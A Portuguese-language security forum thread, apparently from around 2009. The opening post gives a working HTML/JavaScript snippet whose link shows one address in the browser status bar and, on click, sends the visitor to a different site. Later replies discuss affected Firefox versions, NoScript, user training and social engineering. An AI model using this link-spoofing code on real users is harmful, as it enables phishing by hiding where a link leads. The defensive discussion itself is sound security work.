Esconder link no navegador - Últimas versões vulneráveis

Nessa madrugada, estava meio sem o que fazer, ai vi em outro forum, uma mensagem que dizia assim [Vulnerabilidade] Falha Firefox 3.0.5 Grave!, Só tinha um detalhe, essa vunerabilidade que eles colocaram não funcionava no Internet Explorer, ai eu tentei e consegui ir mais além, (Sou Brasileiríssimo).
Bom, o que temos abaixo é um código que vai mostrar um link para o usuário, quando o usuário colocar o mouse sobre ele vai mostrar na barra de status o link correto porém ao clicar no link abre outra página (No caso coloquei o site do ISTF)



<html>
<head>
<title>Marcel de Siqueira - Softwares</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script language="JavaScript" type="text/JavaScript">
<!--
function enganador() { //v1.53
var i, args=enganador.arguments; document.EG_returnValue = false;
for (i=0; i<(args.length-1); i+=2) eval(args[i]+".location='"+args[i+1]+"'");
}
//-->
</script>
</head>
<body>
<h1 align="center">Falso Link - Internet Explorer / Google CHrome / Firefox</h1>
<h4 align="center">Feito por Marcel de Siqueira</h4>
<h4 align="center">marcel.analyzer@gmail.com</h4>
<h3 align="center"><a href="http://www.google.com.br/" onClick="enganador('parent','http://www.istf.com.br');return document.EG_returnValue">www.google.com.br</a></h3>
<p align="center">Reparem a página que ele Vai Indicar na Barra de Status.....</p>
<div style="position:absolute;bottom:0;">
<font style="font-family:arial;font-size:32px">Olha Aqui...<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;V </font> </div>
</body>
</html>


Copiem colem e testem...

Falou pessoal, agora vou dormir, kkk

E viva ao NoScript!

Dependemos dele mais do que imaginamos :)

abraços!

Essa falha já é conhecida desde Janeiro passado, foi publicada no Milw0rm:
Firefox 3.0.5 Status Bar Obfuscation / Clickjacking (http://www.milw0rm.com/exploits/7842)

Aqui no Firefox 3.0.7 versão Linux essa falha não funciona mais.

;)

Essa falha já é conhecida desde Janeiro passado, foi publicada no Milw0rm:
Firefox 3.0.5 Status Bar Obfuscation / Clickjacking (http://www.milw0rm.com/exploits/7842)

Aqui no Firefox 3.0.7 versão Linux essa falha não funciona mais.

;)

Tem certeza? Aqui no Firefox 3.0.7 de Linux (do repositório Ubuntu Intrepid) funcionam perfeitamente ambos os exemplos.

Alguém ainda se baseia na status bar pra saber se deve ou não acessar um link? ;)

E sobre o NoScript, é praticamente impossível usar ele de forma responsável. A maioria dos usuários pega a "mania" de clicar no canto inferior direito e habilitar os scripts na página logo na primeira reclamação.

[]s, MM

Olá Doutores!

Alguém ainda se baseia na status bar pra saber se deve ou não acessar um link? ;)

E sobre o NoScript, é praticamente impossível usar ele de forma responsável. A maioria dos usuários pega a "mania" de clicar no canto inferior direito e habilitar os scripts na página logo na primeira reclamação.

No meu caso, quando fiz o teste, o NoScript bloqueando permitiu ver o status real do link. Me salvou no momeno :D
Eu desbloqueio o necessário para utilização da funcionalidade que eu quero. Demora um pouco mas é a velha balança da "segurança vs usabilidade".
Concordo, não é totalmente eficiente (depende de nós usuários finais). Qual seria a melhor solução então, que não seja tão "incisiva-dependente"?

abraços!


abraços!

Qual seria a melhor solução então, que não seja tão "incisiva-dependente"?

CONTRA-Engenharia-social! :)


(...) devemos considerar não apenas ataques específicos e contramedidas, mas o MODELO MENTAL que (1) faz usuários vulneráveis a este tipo de ataque e (2) faz a gerência resistente a lutar contra isso. Formalizar o problema torna mais fácil atingir soluções eficientes, utilizando políticas realistas e pragmáticas. A implementação eficaz destas políticas, por melhor que estas sejam, não é possível sem considerar a educação do usuário e a cooperação da gerência, e atenção considerável é dada a necessidade de aplicar a engenharia social construtiva para ambos grupos. (...)
Enquanto o Engenheiro Social desejará explorar o comportamento da vítima sem necessariamente o modificar, o profissional de segurança consciente estará mais preocupado com a MUDANÇA DE COMPORTAMENTO envolvida na educação do usuário inconsciente das questões de segurança. (...)
Engenharia Social não é uma ameaça única. É uma classe inteira de problemas, sem uma solução genérica. Engenheiros Sociais se aproveitam da fraqueza humana, os vícios e virtudes discutidos anteriormente. (...) Na tentativa de lutar contra ataques de engenharia social, nós pedimos aos usuários que se elevem não só acima de sua própria ignorância, mas em alguns aspectos acima de suas próprias boas naturezas.

Re-Floating the Titanic: Dealing with Social Engineering Attacks
Re-Floating the Titanic: Dealing with Social Engineering (http://cluestick.info/hoax/harley_eicar98.htm)

CONTRA-Engenharia-social! :)Nesse caso específico, um treinamento do usuário final? Ensiná-lo a utilizar o firebug :) ? E quando um prolema técnico sem solução, ficaria difícil querer que o usuário do software perceba uma vulnerabilidade como essa.

Concordo sim que o melhor remédio é a prevenção e no caso de um SGSI o treinamento é a melhor forma de garantir um nível de segurança eficiênte. Mas se a culpa(como neste caso) não é deles, mas sim do produto?


abraços!

Não precisa criar regras para todo o tipo de cenário. Regras simples. Poderíamos aumentar o nível de conhecimento técnico dos usuários. Ou voltar aos princípios: "Não rodar programas não autenticados". O esquema pode ultrapassar todas as barreiras de detecção que você criar, mas mesmo assim no final das contas o cara tem que ser PERSUADIDO a clicar ou executar. O que estou querendo dizer é que a PSICOLOGIA da coisa é fundamental, algo vai cheirar estranho no hoax, o maior detector de código malicioso nesse caso não deixa de ser a parte humana. Não precisa aumentar o nível técnico, as pessoas precisam deixar de ser ingênuas e 99,99999% dos problemas acabam por aí.

Hei pessoal!

Eu uso firefox 3.0.8 no Linux, e mesmo assim ainda o link a falha está ocorrendo...
Alguem tem alguns link's para eu dar uma lida sobre?

Obrigado!

Amigos do fórum, por favor me esclareçam: Este exemplo do Marcel, é um exemplo de clickjacking ou o clickjacking é diferente disso. Tenho algumas informações sobre clickjacking lá no meu blog, porém ainda não está 100% claro o entendimento disso pra mim. Por favor, clareiem a minha mente :)

Abraço
Evaldo